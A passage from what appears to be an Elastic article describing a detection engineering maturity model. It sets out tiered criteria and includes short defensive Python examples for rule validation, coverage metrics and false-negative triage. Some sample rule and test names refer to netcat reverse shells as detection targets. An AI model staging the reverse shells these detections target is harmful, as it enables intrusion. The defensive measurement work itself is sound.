<li>Defined: Roadmap documented for 50-70% of rules; regular updates and stakeholder meetings; 50% of rules have a planned update schedule.</li>
<li>Managed: Comprehensive roadmap for 70-90% of rules; frequent updates and stakeholder meetings; 70% of rules have a planned update schedule and tracked progress.</li>
<li>Optimized: Fully integrated roadmap for 90-100% of rules; continuous updates and proactive stakeholder engagement; 90-100% of rules have a planned update schedule with formal tracking processes.</li>
</ul>
</li>
</ul>
<h6>Threat Modeling Performed</h6>
<ul>
<li>Qualitative Behaviors - State of Ruleset:
<ul>
<li>Initial: No threat modeling performed.</li>
<li>Repeatable: Occasional, ad-hoc threat modeling with minimal impact on rule creation and no consideration of data and environment specifics.</li>
<li>Defined: Regular threat modeling with structured processes influencing rule creation, considering data and environment specifics.</li>
<li>Managed: Comprehensive threat modeling integrated into rule creation and updates, with detailed documentation and stakeholder involvement.</li>
<li>Optimized: Continuous, proactive threat modeling with real-time data integration, influencing all aspects of rule creation and management with full stakeholder engagement.</li>
</ul>
</li>
<li>Quantitative Measurements - Activities to Maintain State:
<ul>
<li>Initial: No formal threat modeling activities.</li>
<li>Repeatable: Sporadic threat modeling efforts; less than one threat modeling exercise conducted per year with minimal documentation or impact analysis; threat models are reviewed or updated less than twice a year; less than 10% of new rules are based on threat modeling outcomes, and data and environment specifics are not consistently considered.</li>
<li>Defined: Regular threat modeling efforts; one to two annual exercises with detailed documentation and impact analysis; threat models reviewed or updated quarterly; 50-70% of new rules are based on threat modeling outcomes.</li>
<li>Managed: Comprehensive threat modeling activities; three to four exercises conducted per year with thorough documentation and impact analysis; threat models reviewed or updated bi-monthly; 70-90% of new rules are based on threat modeling outcomes.</li>
<li>Optimized: Continuous threat modeling efforts; monthly exercises with real-time documentation and impact analysis; threat models reviewed or updated continuously; 90-100% of new rules are based on threat modeling outcomes, considering data and environment specifics.</li>
</ul>
</li>
</ul>
<h4>Tier 1: Basic</h4>
<p>The basic tier involves creating a baseline of rules to cover fundamental threats. This includes differentiating between baseline rules for core protection and other supporting rules. Systematic rule management, including version control and documentation, is established. There is a focus on improving and maintaining telemetry quality and reviewing threat landscape changes regularly. At Elastic, we have always followed a Detections as Code (DAC) approach to rule management, which has helped us maintain our rulesets. We have recently exposed some of our internal capabilities and <a href="https://dac-reference.readthedocs.io/en/latest/">documented core DAC principles</a> for the community to help improve your workflows.</p>
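<p>In a Detections as Code workflow, one of the simplest wins is a pre-merge check that every rule file in version control parses and carries its required fields. A minimal sketch, with an illustrative directory layout and required-field set:</p>

```python
# Sketch of a Detections-as-Code pre-merge check: every rule file under
# version control must parse and pass validation before release.
# The directory layout and REQUIRED set are illustrative assumptions.
import json
import pathlib

REQUIRED = {"rule_id", "name", "query", "version"}

def check_rules(rules_dir):
    """Collect validation failures across all JSON rule files in a directory."""
    failures = []
    for path in sorted(pathlib.Path(rules_dir).glob("*.json")):
        try:
            rule = json.loads(path.read_text())
        except json.JSONDecodeError:
            failures.append(f"{path.name}: invalid JSON")
            continue
        missing = REQUIRED - rule.keys()
        if missing:
            failures.append(f"{path.name}: missing {sorted(missing)}")
    return failures

# In CI, a non-empty failure list would fail the merge, for example:
#   failures = check_rules("rules/")
#   if failures:
#       raise SystemExit("\n".join(failures))
```

Gating merges on a check like this is what moves rule management from "occasional processes with some documentation" toward the Managed behavior of schema validation, versioning, and automation described below.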
<p><img src="https://www.elastic.co/es/security-labs/assets/images/elastic-releases-debmm/image8.png" alt="DEBMM - Tier 1" title="DEBMM - Tier 1" /></p>
<h5>Criteria</h5>
<p><strong>Creating a Baseline</strong></p>
<p>Creating a baseline of rules involves developing a foundational set of rules to cover basic threats. This process starts with understanding the environment and the data available, ensuring that the rules are tailored to the specific needs and capabilities of the organization. The focus should be on critical tactics such as initial access, execution, persistence, privilege escalation, command &amp; control, and critical assets determined by threat modeling and scope. A baseline is defined as the minimal rules necessary to detect critical threats within these tactics or assets, recognizing that not all techniques may be covered. Key tactics are defined as the initial stages of an attack lifecycle where attackers gain entry, establish a foothold, and escalate privileges to execute their objectives. Major threats are defined as threats that can cause significant harm or disruption to the organization, such as ransomware, data exfiltration, and unauthorized access. Supporting rules, such as Elastic’s Building Block Rules (BBR), help enhance the overall detection capability.</p>
<p>Given the evolution of SIEM and the integration of Endpoint Detection and Response (EDR) solutions, there is an alternative first step for users who utilize an EDR. Not all SIEM users have an EDR, so this step may not apply to everyone, but organizations that do should validate that their EDR provides sufficient coverage of basic TTPs. Once this validation is complete, you may supplement that coverage for specific threats of concern based on your environment. Identify high-value assets and profile what typical host and network behavior looks like for them. Develop rules to detect deviations, such as new software installations or unexpected network connections, to ensure a comprehensive security posture tailored to your needs.</p>
<p>Comprehensive documentation goes beyond basic descriptions to include detailed explanations, investigative steps, and context about each rule. For example, general documentation states the purpose of a rule and its query logic. In contrast, comprehensive documentation provides an in-depth analysis of the rule's intent, the context of its application, detailed steps for investigation, potential false positives, and related rules. Comprehensive documentation ensures that security analysts have all the necessary information to effectively utilize and maintain the rule, leading to more accurate and actionable detections.</p>
<p>It would begin with an initial context explaining the technology behind the rule, outlining the risks and why the user should care about them, and detailing what the rule does and how it operates. This would be followed by possible investigation steps, including triage, scoping, and detailed investigation steps to analyze the alert thoroughly. A section on false positive analysis also provides steps to identify and mitigate false positives, ensuring the rule's accuracy and reliability. The documentation would also list related rules, including their names and IDs, to provide a comprehensive view of the detection landscape. Finally, response and remediation actions would be outlined to guide analysts in containing, remediating, and escalating the alert based on the triage results, ensuring a swift and effective response to detected threats. Furthermore, a setup guide section would explain any prerequisite configuration the rule needs to function properly, ensuring that users have all the necessary details before deployment.</p>
<ul>
<li>Qualitative Behaviors - State of Ruleset:
<ul>
<li>Initial: A few baseline rules are created to set the foundation for the ruleset.</li>
<li>Repeatable: Some baseline rules created covering key tactics (initial access, execution, persistence, privilege escalation, and command and control) for well-documented threats.</li>
<li>Defined: Comprehensive baseline rules covering significant threats (e.g., ransomware, data exfiltration, unauthorized access) created and documented.</li>
<li>Managed: Queries and rules are validated against the defined schema that aligns with the security product before release.</li>
<li>Optimized: Continuous improvement and fine-tuning baseline rules with advanced threat modeling and automation.</li>
</ul>
</li>
<li>Quantitative Measurements - Activities to Maintain State:
<ul>
<li>Initial: 5-10 baseline rules created and documented per ruleset (e.g., AWS S3 ruleset, AWS Lambda ruleset, Azure ruleset, Endpoint ruleset).</li>
<li>Repeatable: More than ten baseline rules are created and documented per ruleset, covering major techniques based on threat modeling (e.g., probability of targeting, data source availability, impact on critical assets); at least 10% of rules go through a diagnostic phase.</li>
<li>Defined: A significant percentage (e.g., 60-70%) baseline of ATT&amp;CK techniques covered per data source​​; 70-80% of rules tested as diagnostic (beta) rules before production; regular updates and validation of rules.</li>
<li>Managed: 90% or more of baseline ATT&amp;CK techniques covered per data source; 100% of rules undergo a diagnostic phase before production; comprehensive documentation and continuous improvement processes are in place.</li>
<li>Optimized: 100% coverage of baseline ATT&amp;CK techniques per data source; automated diagnostic and validation processes for all rules; continuous integration and deployment (CI/CD) for rule updates.</li>
</ul>
</li>
</ul>
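<p>The technique-coverage percentages above can be computed directly from rule metadata. A minimal sketch; the baseline set, technique IDs, and rules are all hypothetical:</p>

```python
# Sketch: percentage of a baseline set of ATT&CK techniques covered by the
# rules of one data source. The baseline and rule metadata are hypothetical.
BASELINE = {"T1059", "T1078", "T1098", "T1105", "T1566"}  # example baseline

rules = [
    {"name": "r1", "data_source": "aws", "techniques": {"T1078", "T1098"}},
    {"name": "r2", "data_source": "aws", "techniques": {"T1098"}},
    {"name": "r3", "data_source": "endpoint", "techniques": {"T1059"}},
]

def coverage(rules, data_source, baseline):
    """Percent of baseline techniques matched by at least one rule of a source."""
    covered = set()
    for r in rules:
        if r["data_source"] == data_source:
            covered |= r["techniques"] & baseline
    return 100 * len(covered) / len(baseline)

print(coverage(rules, "aws", BASELINE))  # 40.0 (2 of 5 baseline techniques)
```

Tracking this number per data source (AWS, Azure, endpoint, and so on) is what makes the 60-70% and 90%+ thresholds in the measurements above verifiable rather than aspirational.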
<h6>Managing and Maintaining Rulesets</h6>
<p>A systematic approach to managing and maintaining rules, including version control, documentation, and validation.</p>
<ul>
<li>Qualitative Behaviors - State of Ruleset:
<ul>
<li>Initial: No rule management.</li>
<li>Repeatable: Occasional rule processes with some documentation and a recurring release cycle for rules.</li>
<li>Defined: Regular rule management with comprehensive documentation and version control.</li>
<li>Managed: Applies a Detections as Code (schema validation, query validation, versioning, automation, etc.) approach to rule management.</li>
<li>Optimized: Advanced automated processes with continuous weekly rule management and validation; complete documentation and version control for all rules.</li>
</ul>
</li>
<li>Quantitative Measurements - Activities to Maintain State:
<ul>
<li>Initial: No rule management activities.</li>
<li>Repeatable: Basic rule management activities are conducted quarterly; less than 20% of rules have version control.</li>
<li>Defined: Regular rule updates and documentation are conducted monthly; 50-70% of rules have version control and comprehensive documentation.</li>
<li>Managed: Automated processes for rule management and validation are conducted bi-weekly; 80-90% of rules are managed using Detections as Code principles.</li>
<li>Optimized: Advanced automated processes with continuous weekly rule management and validation; 100% of rules managed using Detections as Code principles, with complete documentation and version control.</li>
</ul>
</li>
</ul>
<h6>Improving and Maintaining Telemetry Quality</h6>
<p>Begin conversations and develop relationships with teams managing telemetry data. This applies differently to various security teams: for vendors, it may involve data from all customers; for SOC or Infosec teams, it pertains to company data; and for MSSPs, it covers data from managed clusters. Having good data sources is crucial for all security teams to ensure the effectiveness and accuracy of their detection rules. This also includes incorporating cyber threat intelligence (CTI) workflows to enrich telemetry data with relevant threat context and indicators, improving detection capabilities. Additionally, work with your vendor and align your detection engineering milestones with their feature milestones to ensure you're utilizing the best tooling and getting the most out of your detection rules. This optional criterion can be skipped if not applicable to internal security teams.</p>
<ul>
<li>Qualitative Behaviors - State of Ruleset:
<ul>
<li>Initial: No telemetry updates or improvements to support the ruleset.</li>
<li>Repeatable: Occasional manual updates and minimal ad hoc collaboration.</li>
<li>Defined: Regular updates with significant integration and formalized collaboration, including communication with Points of Contact (POCs) from integration teams and initial integration of CTI data.</li>
<li>Managed: Comprehensive updates and collaboration with consistent integration of CTI data, enhancing the contextual relevance of telemetry data and improving detection accuracy.</li>
<li>Optimized: Advanced integration of CTI workflows with telemetry data, enabling real-time enrichment and automated responses to emerging threats.</li>
</ul>
</li>
<li>Quantitative Measurements - Activities to Maintain State:
<ul>
<li>Initial: No telemetry updates or improvements.</li>
<li>Repeatable: Basic manual updates and improvements occurring sporadically; less than 30% of rule types produce telemetry/internal data.</li>
<li>Defined: Regular manual updates and improvements occurring at least once per quarter, with periodic CTI data integration; 50-70% of telemetry data integrated with CTI; initial documentation of enhancements in data quality and rule effectiveness.</li>
<li>Managed: Semi-automated updates with continuous improvements, regular CTI data enrichment, and initial documentation of enhancements in data quality and rule effectiveness; 70-90% of telemetry data integrated with CTI.</li>
<li>Optimized: Fully automated updates and continuous improvements, comprehensive CTI integration, and detailed documentation of enhancements in data quality and rule effectiveness; 100% of telemetry data integrated with CTI; real-time enrichment and automated responses to emerging threats.</li>
</ul>
</li>
</ul>
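<p>The CTI enrichment described above can be sketched as a simple indicator lookup applied to telemetry at ingest or query time. The indicator feed, event fields, and addresses below are hypothetical (the IPs come from documentation ranges):</p>

```python
# Sketch of enriching telemetry events with CTI context. The indicator
# feed, field names, and IP addresses are illustrative assumptions.
CTI_INDICATORS = {
    "198.51.100.7": {"threat": "ExampleBotnet", "confidence": "high"},
    "203.0.113.9":  {"threat": "ExampleC2",     "confidence": "medium"},
}

def enrich(event: dict, indicators: dict) -> dict:
    """Attach threat context when the event's destination IP is a known indicator."""
    hit = indicators.get(event.get("destination_ip"))
    if hit:
        event = {**event, "threat_context": hit}
    return event

event = {"host": "web-01", "destination_ip": "198.51.100.7"}
print(enrich(event, CTI_INDICATORS)["threat_context"]["threat"])  # ExampleBotnet
```

In practice this lookup would run inside the ingest pipeline or SIEM enrichment feature rather than application code, but the principle — telemetry plus CTI context yields higher-fidelity detections — is the same.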
<h6>Reviewing Threat Landscape Changes</h6>
<p>Regularly assess and update rules based on changes in the threat landscape, including threat modeling and organizational changes.</p>
<ul>
<li>Qualitative Behaviors - State of Ruleset:
<ul>
<li>Initial: No reviews of threat landscape changes.</li>
<li>Repeatable: Occasional reviews with minimal updates and limited threat modeling.</li>
<li>Defined: Regular reviews and updates to ensure rule relevance and effectiveness, incorporating threat modeling.</li>
<li>Managed: Maintaining the ability to adaptively respond to emerging threats and organizational changes, with comprehensive threat modeling and cross-correlation of new intelligence.</li>
<li>Optimized: Continuous monitoring and real-time updates based on emerging threats and organizational changes, with dynamic threat modeling and cross-correlation of intelligence.</li>
</ul>
</li>
<li>Quantitative Measurements - Activities to Maintain State:
<ul>
<li>Initial: No reviews conducted.</li>
<li>Repeatable: Reviews conducted bi-annually, referencing cyber blog sites and company reports; less than 30% of rules are reviewed based on threat landscape changes.</li>
<li>Defined: Comprehensive quarterly reviews conducted, incorporating new organizational changes, documented changes and improvements in rule effectiveness; 50-70% of rules are reviewed based on threat landscape changes.</li>
<li>Managed: Continuous monitoring (monthly, weekly, or daily) of cyber intelligence sources, with actionable knowledge implemented and rules adjusted for new assets and departments; 90-100% of rules are reviewed and updated based on the latest threat intelligence and organizational changes.</li>
<li>Optimized: Real-time monitoring and updates with automated intelligence integration; 100% of rules are continuously reviewed and updated based on dynamic threat landscapes and organizational changes.</li>
</ul>
</li>
</ul>
<h6>Driving the Feature with Product Owners</h6>
<p>Actively engaging with product owners (internal or external) to ensure that detection needs land on the product roadmap, whether those needs concern the detection rule lifecycle or product limitations that block detection creation. This applies differently to vendors and in-house security teams: for in-house teams, it can cover custom applications developed internally as well as engagement with vendors or third-party tooling. It also implies building relationships with vendors (such as Elastic) to file feature requests that support detection needs, especially when action must be taken by a third party rather than internally.</p>
<ul>
<li>Qualitative Behaviors - State of Ruleset:
<ul>
<li>Initial: No engagement with product owners.</li>
<li>Repeatable: Occasional, ad hoc engagement with some influence on the roadmap.</li>
<li>Defined: Regular engagement and significant influence on the product roadmap.</li>
<li>Managed: Structured engagement with product owners, leading to consistent integration of detection needs into the product roadmap.</li>
<li>Optimized: Continuous, proactive engagement with product owners, ensuring that detection needs are fully integrated into the product development lifecycle with real-time feedback and updates.</li>
</ul>
</li>
<li>Quantitative Measurements - Activities to Maintain State:
<ul>
<li>Initial: No engagements with product owners.</li>
<li>Repeatable: 1-2 engagements/requests completed per quarter; less than 20% of requests result in roadmap changes.</li>
<li>Defined: More than two engagements/requests per quarter, resulting in roadmap changes and improvements in the detection ruleset; 50-70% of requests result in roadmap changes; regular tracking and documentation of engagement outcomes.</li>
<li>Managed: Frequent engagements with product owners leading to more than 70% of requests resulting in roadmap changes; structured tracking and documentation of all engagements and outcomes.</li>
<li>Optimized: Continuous engagement with product owners with real-time tracking and adjustments; 90-100% of requests lead to roadmap changes; comprehensive documentation and proactive feedback loops.</li>
</ul>
</li>
</ul>
<h6>End-to-End Release Testing and Validation</h6>
<p>Implementing a robust end-to-end release testing and validation process to ensure the reliability and effectiveness of detection rules before pushing them to production. This includes running different tests to catch potential issues and ensure rule accuracy.</p>
<ul>
<li>Qualitative Behaviors - State of Ruleset:
<ul>
<li>Initial: No formal testing or validation process.</li>
<li>Repeatable: Basic testing with minimal validation.</li>
<li>Defined: Comprehensive testing with internal validation processes and multiple gates.</li>
<li>Managed: Advanced testing with automated and external validation processes.</li>
<li>Optimized: Continuous, automated testing and validation with real-time feedback and improvement mechanisms.</li>
</ul>
</li>
<li>Quantitative Measurements - Activities to Maintain State:
<ul>
<li>Initial: No testing or validation activities.</li>
<li>Repeatable: 1-2 ruleset updates per release cycle (release cadence should be driven internally, based on resources and mandated processes); less than 20% of rules tested before deployment.</li>
<li>Defined: Time to end-to-end test and release a new rule or tuning from development to production is less than one week; 50-70% of rules are tested before deployment with documented validation.</li>
<li>Managed: Ability to deploy an emerging threat rule within 24 hours; 90-100% of rules tested before deployment using automated and external validation processes; continuous improvement based on test outcomes.</li>
<li>Optimized: Real-time testing and validation with automated deployment processes; 100% of rules tested and validated continuously; proactive improvement mechanisms based on real-time feedback and intelligence.</li>
</ul>
</li>
</ul>
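<p>The release process described above can be sketched as a simple pre-deployment gate: every candidate rule must pass a set of checks before it reaches production. The rule shape and checks here are illustrative, not any specific product's schema.</p>

```python
# Hypothetical pre-release validation gate for detection rules. Each rule must
# pass every check before it is allowed into the production ruleset, as a CI
# step in a release pipeline might enforce.

REQUIRED_FIELDS = {"name", "query", "severity", "risk_score"}

def validate_rule(rule):
    """Return a list of human-readable problems; an empty list means the rule passes."""
    problems = [f"missing field: {f}" for f in sorted(REQUIRED_FIELDS - rule.keys())]
    if not rule.get("query", "").strip():
        problems.append("empty query")
    if not 0 <= rule.get("risk_score", -1) <= 100:
        problems.append("risk_score out of range 0-100")
    return problems

def release_gate(rules):
    """Split candidate rules into deployable and blocked, with reasons."""
    deployable, blocked = [], {}
    for rule in rules:
        problems = validate_rule(rule)
        if problems:
            blocked[rule.get("name", "<unnamed>")] = problems
        else:
            deployable.append(rule)
    return deployable, blocked

candidates = [
    {"name": "Reverse Shell via Netcat", "query": "process where ...", "severity": "high", "risk_score": 73},
    {"name": "Broken Rule", "query": "", "severity": "low", "risk_score": 300},
]
deployable, blocked = release_gate(candidates)  # one rule deploys, one is blocked
```

Gates like this are what let the "Managed" level promise an emerging-threat rule within 24 hours without sacrificing rule accuracy.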
<h4>Tier 2: Intermediate</h4>
<p>At the intermediate tier, teams continuously tune detection rules to reduce false positives and stale rules. They identify and document gaps in ruleset coverage, testing and validating rules internally with emulation tools and malware detonations to ensure proper alerting. Systematic gap analysis and regular communication with stakeholders are emphasized.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/elastic-releases-debmm/image3.png" alt="DEBMM - Tier 2" title="DEBMM - Tier 2" /></p>
<h5>Criteria</h5>
<h6>Continuously Tuning and Reducing False Positives (FP)</h6>
<p>Regularly reviewing and adjusting rules to minimize false positives and stale rules. Establish shared/scalable exception lists when necessary to prevent repetitive adjustments and document past FP analysis to avoid recurring issues.</p>
<ul>
<li>Qualitative Behaviors - State of Ruleset:
<ul>
<li>Initial: Minimal tuning activities.</li>
<li>Repeatable: Reactive tuning based on alerts and ad hoc analyst feedback.</li>
<li>Defined: Proactive and systematic tuning, with documented reductions in FP rates and documented/known data sources, leveraged to reduce FPs.</li>
<li>Managed: Continuously tuned activities with detailed documentation and regular stakeholder communication; implemented systematic reviews and updates.</li>
<li>Optimized: Automated and dynamic tuning processes integrated with advanced analytics and machine learning to continuously reduce FPs and adapt to new patterns.</li>
</ul>
</li>
<li>Quantitative Measurements - Activities to Maintain State:
<ul>
<li>Initial: No reduction in FP rate, measured against the overall volume of FP alerts.</li>
<li>Repeatable: 10-25% reduction in FP rate over the last quarter.</li>
<li>Defined: More than a 25% reduction in FP rate over the last quarter, with metrics varying (rate determined by ruleset feature owner) between SIEM and endpoint rules based on the threat landscape.</li>
<li>Managed: Consistent reduction in FP rate exceeding 50% over multiple quarters, with detailed metrics tracked and reported.</li>
<li>Optimized: Near real-time reduction in FP rate with automated feedback loops and continuous improvement, achieving over 75% reduction in FP rate.</li>
</ul>
</li>
</ul>
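<p>The quarter-over-quarter FP reduction used in the measurements above reduces to a simple ratio; the thresholds below mirror the levels listed, and the alert counts are illustrative.</p>

```python
# Quarter-over-quarter false-positive reduction, the quantitative measure for
# this criterion. Alert counts are illustrative.

def fp_reduction(prev_quarter_fps, current_quarter_fps):
    """Fractional reduction in FP volume relative to the previous quarter."""
    if prev_quarter_fps == 0:
        return 0.0
    return (prev_quarter_fps - current_quarter_fps) / prev_quarter_fps

def level_for_reduction(reduction):
    """Map a reduction to the state levels above (thresholds per the text)."""
    if reduction > 0.75:
        return "Optimized"
    if reduction > 0.50:
        return "Managed"
    if reduction > 0.25:
        return "Defined"
    if reduction >= 0.10:
        return "Repeatable"
    return "Initial"

reduction = fp_reduction(prev_quarter_fps=400, current_quarter_fps=240)  # 40% fewer FPs
level = level_for_reduction(reduction)  # → "Defined"
```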
<h6>Understanding and Documenting Gaps</h6>
<p>Identifying gaps in ruleset or product coverage is essential for improving data visibility and detection capabilities. This includes documenting missing fields, logging datasets, and understanding outliers in the data. Communicating these gaps with stakeholders and addressing them as &quot;blockers&quot; helps ensure continuous improvement. By understanding outliers, teams can identify unexpected patterns or anomalies that may indicate undetected threats or issues with the current ruleset.</p>
<ul>
<li>Qualitative Behaviors - State of Ruleset:
<ul>
<li>Initial: No gap analysis.</li>
<li>Repeatable: Occasional gap analysis with some documentation.</li>
<li>Defined: Comprehensive and regular gap analysis with detailed documentation and stakeholder communication, including identifying outliers in the data.</li>
<li>Managed: Systematic gap analysis integrated into regular workflows, with comprehensive documentation and proactive communication with stakeholders.</li>
<li>Optimized: Automated gap analysis using advanced analytics and machine learning, with real-time documentation and proactive stakeholder engagement to address gaps immediately.</li>
</ul>
</li>
<li>Quantitative Measurements - Activities to Maintain State:
<ul>
<li>Initial: No gaps documented.</li>
<li>Repeatable: 1-3 gaps in threat coverage (e.g., specific techniques like reverse shells, code injection, brute force attacks) documented and communicated.</li>
<li>Defined: More than three gaps in threat coverage or data visibility documented and communicated, including gaps that block rule creation (e.g., lack of agent/logs) and outliers identified in the data.</li>
<li>Managed: Detailed documentation and communication of all identified gaps, with regular updates and action plans to address them; over five gaps documented and communicated regularly.</li>
<li>Optimized: Continuous real-time gap analysis with automated documentation and communication; proactive measures in place to address gaps immediately; comprehensive tracking and reporting of all identified gaps.</li>
</ul>
</li>
</ul>
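<p>A minimal version of the gap analysis above compares the techniques the ruleset claims to cover against the techniques the threat model requires. Technique IDs follow MITRE ATT&amp;CK naming; the sets themselves are illustrative.</p>

```python
# Sketch of coverage gap analysis: compare techniques the ruleset covers
# against techniques the threat model requires. Rule-to-technique mappings
# here are illustrative.

def coverage_gaps(rules, required_techniques):
    """Return (covered, gaps) as sets of technique IDs from the required list."""
    covered = {t for rule in rules for t in rule.get("techniques", [])}
    required = set(required_techniques)
    return covered & required, required - covered

rules = [
    {"name": "Shell via web server", "techniques": ["T1505.003"]},
    {"name": "Credential dumping", "techniques": ["T1003.001", "T1003.002"]},
]
threat_model = ["T1505.003", "T1003.001", "T1110"]  # brute force (T1110) has no rule

covered, gaps = coverage_gaps(rules, threat_model)  # gaps → {"T1110"}
```

Each entry in <code>gaps</code> is a candidate for the documented, communicated "blockers" this criterion calls for.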
<h6>Testing and Validation (Internal)</h6>
<p>Performing activities like executing emulation tools, C2 frameworks, detonating malware, or other repeatable techniques to test rule functionality and ensure proper alerting.</p>
<ul>
<li>Qualitative Behaviors - State of Ruleset:
<ul>
<li>Initial: No testing or validation.</li>
<li>Repeatable: Occasional testing with emulation capabilities.</li>
<li>Defined: Regular and comprehensive testing with malware or emulation capabilities, ensuring all rules in production are validated.</li>
<li>Managed: Systematic testing and validation processes integrated into regular workflows, with detailed documentation and continuous improvement.</li>
<li>Optimized: Automated and continuous testing and validation with advanced analytics and machine learning, ensuring real-time validation and improvement of all rules.</li>
</ul>
</li>
<li>Quantitative Measurements - Activities to Maintain State:
<ul>
<li>Initial: No internal tests conducted.</li>
<li>Repeatable: 40% emulation coverage of production ruleset.</li>
<li>Defined: 80% automated testing coverage of production ruleset.</li>
<li>Managed: Over 90% automated testing coverage of production ruleset with continuous validation processes.</li>
<li>Optimized: 100% automated and continuous testing coverage with real-time validation and feedback loops, ensuring optimal rule performance and accuracy.</li>
</ul>
</li>
</ul>
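<p>Emulation coverage, the quantitative measure above, reduces to the share of production rules exercised by at least one internal test. The rule-to-test mapping below is illustrative.</p>

```python
# Emulation coverage: the share of production rules exercised by at least one
# internal test (emulation run, detonation, or unit test). IDs are illustrative.

def emulation_coverage(production_rule_ids, tested_rule_ids):
    """Fraction of production rules with at least one associated test."""
    production = set(production_rule_ids)
    if not production:
        return 0.0
    return len(production & set(tested_rule_ids)) / len(production)

production = ["r-001", "r-002", "r-003", "r-004", "r-005"]
tested = ["r-001", "r-003"]  # e.g., rules exercised by an emulation run

coverage = emulation_coverage(production, tested)  # 0.4 → below the 80% "Defined" bar
```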
<h4>Tier 3: Advanced</h4>
<p>Advanced maturity involves systematically identifying and addressing false negatives, validating detection rules externally, and covering advanced TTPs (Tactics, Techniques, and Procedures). This tier emphasizes comprehensive and continuous improvement through external assessments and coverage of sophisticated threats.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/elastic-releases-debmm/image9.png" alt="DEBMM - Tier 3" title="DEBMM - Tier 3" /></p>
<h5>Criteria</h5>
<h6>Triaging False Negatives (FN)</h6>
<p>Triaging False Negatives (FN) involves systematically identifying and addressing instances where the detection rules fail to trigger alerts for actual threats. False negatives occur when a threat is present in the dataset but is not detected by the existing rules, potentially leaving the organization vulnerable to undetected attacks. Leveraging threat landscape insights, this process documents and assesses false negatives within respective environments, aiming to meet the true-positive thresholds defined in the quantitative criteria.</p>
<ul>
<li>Qualitative Behaviors - State of Ruleset:
<ul>
<li>Initial: No triage of false negatives.</li>
<li>Repeatable: Sporadic triage with some improvements.</li>
<li>Defined: Systematic and regular triage with documented reductions in FNs and comprehensive FN assessments in different threat landscapes.</li>
<li>Managed: Proactive triage activities with detailed documentation and stakeholder communication; regular updates to address FNs.</li>
<li>Optimized: Continuous, automated triage and reduction of FNs using advanced analytics and machine learning; real-time documentation and updates.</li>
</ul>
</li>
<li>Quantitative Measurements - Activities to Maintain State:
<ul>
<li>Initial: No reduction in FN rate.</li>
<li>Repeatable: 50% of the tested samples or tools trigger an alert; less than 10% of rules are reviewed for FNs quarterly; minimal documentation of FN assessments.</li>
<li>Defined: 70-90% of the tested samples trigger an alert, with metrics varying based on the threat landscape and detection capabilities; 30-50% reduction in FNs over the past year; comprehensive documentation and review of FNs for at least 50% of the rules quarterly; regular feedback loops established with threat intelligence teams.</li>
<li>Managed: 90-100% of tested samples trigger an alert, with consistent FN reduction metrics tracked; over 50% reduction in FNs over multiple quarters; comprehensive documentation and feedback loops for all rules.</li>
<li>Optimized: Near real-time FN triage with automated feedback and updates; over 75% reduction in FNs; continuous documentation and proactive measures to address FNs.</li>
</ul>
</li>
</ul>
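<p>FN triage can start from detonation results: samples that produced no alert are queued as false negatives, and the alert-trigger rate maps onto the thresholds above. The sample data is illustrative.</p>

```python
# FN triage sketch: detonate samples (or replay emulations), record which rules
# alerted, and queue silent samples as false negatives for analysis.

def triage_false_negatives(detonation_results):
    """detonation_results maps sample name -> list of rule IDs that alerted.
    Returns (silent samples to triage, alert-trigger rate)."""
    false_negatives = [s for s, alerts in detonation_results.items() if not alerts]
    rate = 1 - len(false_negatives) / len(detonation_results) if detonation_results else 0.0
    return false_negatives, rate

results = {
    "credential_dump_sample": ["r-cred-dump"],
    "custom_loader": [],            # silent: a false negative to triage
    "nc_reverse_shell": ["r-shell"],
    "novel_packer": [],             # silent: a false negative to triage
}
false_negatives, trigger_rate = triage_false_negatives(results)  # trigger_rate = 0.5
```

A 50% trigger rate sits at the "Repeatable" level above; the triage queue is where the documented FN assessments come from.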
<h6>External Validation</h6>
<p>External Validation involves engaging third parties to validate detection rules through various methods, including red team exercises, third-party assessments, penetration testing, and collaboration with external threat intelligence providers. By incorporating diverse perspectives and expertise, this process ensures that the detection rules are robust, comprehensive, and effective against real-world threats.</p>
<ul>
<li>Qualitative Behaviors - State of Ruleset:
<ul>
<li>Initial: No external validation.</li>
<li>Repeatable: Occasional external validation efforts with some improvements.</li>
<li>Defined: Regular and comprehensive external validation with documented feedback, improvements, and integration of findings into the detection ruleset. This level includes all of these validation methods.</li>
<li>Managed: Structured external validation activities with detailed documentation and continuous improvement; proactive engagement with multiple third-party validators.</li>
<li>Optimized: Continuous external validation with automated feedback integration, real-time updates, and proactive improvements based on diverse third-party insights.</li>
</ul>
</li>
<li>Quantitative Measurements - Activities to Maintain State:
<ul>
<li>Initial: No external validation conducted.</li>
<li>Repeatable: 1 external validation exercise per year, such as a red team exercise or third-party assessment; less than 20% of identified gaps are addressed annually.</li>
<li>Defined: More than one external validation exercise per year, including a mix of methods such as red team exercises, third-party assessments, penetration testing, and collaboration with external threat intelligence providers; detailed documentation of improvements based on external feedback, with at least 80% of identified gaps addressed within a quarter; integration of external validation findings into at least 50% of new rules.</li>
<li>Managed: Multiple external validation exercises per year, with comprehensive feedback integration; over 90% of identified gaps addressed within set timelines; proactive updates to rules based on continuous external insights.</li>
<li>Optimized: Continuous, real-time external validation with automated feedback and updates; 100% of identified gaps addressed proactively; comprehensive tracking and reporting of all external validation outcomes.</li>
</ul>
</li>
</ul>
<h6>Advanced TTP Coverage</h6>
<p>Covering non-commodity malware (APTs, zero-days, etc.) and emerging threats (new malware families and offensive security tools abused by threat actors, etc.) in the ruleset. This coverage is influenced by the capability of detecting these advanced threats, which requires comprehensive telemetry and flexible data ingestion. While demonstrating these behaviors early in the maturity process can have a compounding positive effect on team growth, this criterion is designed to focus on higher fidelity rulesets with low FPs.</p>
<ul>
<li>Qualitative Behaviors - State of Ruleset:
<ul>
<li>Initial: No advanced TTP coverage.</li>
<li>Repeatable: Response to some advanced TTPs based on third-party published research.</li>
<li>Defined: First-party coverage created for advanced TTPs based on threat intelligence and internal research, with flexible and comprehensive data ingestion capabilities.</li>
<li>Managed: Proactive coverage for advanced TTPs with detailed threat intelligence and continuous updates; integration with diverse data sources for comprehensive detection.</li>
<li>Optimized: Continuous, automated coverage for advanced TTPs using advanced analytics and machine learning; real-time updates and proactive measures for emerging threats.</li>
</ul>
</li>
<li>Quantitative Measurements - Activities to Maintain State:
<ul>
<li>Initial: No advanced TTP coverage.</li>
<li>Repeatable: Detection and response to 1-3 advanced TTPs/adversaries based on available data and third-party research; less than 20% of rules cover advanced TTPs.</li>
